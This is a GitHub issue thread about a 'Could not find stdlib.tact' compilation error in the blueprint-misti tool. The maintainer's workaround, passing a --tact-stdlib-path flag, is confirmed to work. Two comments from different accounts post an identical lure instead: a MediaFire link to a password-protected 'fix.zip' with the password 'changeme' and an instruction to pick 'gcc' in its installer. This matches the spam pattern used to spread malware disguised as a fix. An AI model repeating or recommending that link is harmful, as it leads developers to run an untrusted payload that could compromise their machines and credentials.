### ISSUE TITLE
Compilation error: Could not find stdlib.tact

### ISSUE THREAD

**Issue by UnlimitedBread** [nowarp/blueprint-misti#3]
When I execute the following command:
`npx blueprint misti ./tact.config.json`
I receive this error:
`Compilation error: Could not find stdlib.tact at D:\PathToMyProject\node_modules\.pnpm\@nowarp+blueprint-misti@0.2.4_@ton+blueprint@0.21.0_@ton+core@0.57.0_@ton+crypto@3.3.0__@ton+_wvinck7q6v7z4rskslwg5w3e5q\node_modules\@tact-lang\compiler\stdlib\stdlib.tact`

The last part of the path is indeed missing:
`\node_modules\@tact-lang\compiler\stdlib\stdlib.tact`
There's no `node_modules` folder in the specified location.

Is there a way to fix this error?

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jubnzv** [comment]
Thank you for reporting this!
https://github.com/nowarp/misti/issues/107 will resolve this when closed. To bypass this, you could use `npx blueprint misti ./tact.config.json --tact-stdlib-path D:\PathToMyProject\node_modules\.pnpm\<path-to-stdlib>`.

**Comment by UnlimitedBread** [comment]
> `npx blueprint misti ./tact.config.json --tact-stdlib-path D:\PathToMyProject\node_modules\.pnpm\<path-to-stdlib>`.

That fixed the problem, thanks.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
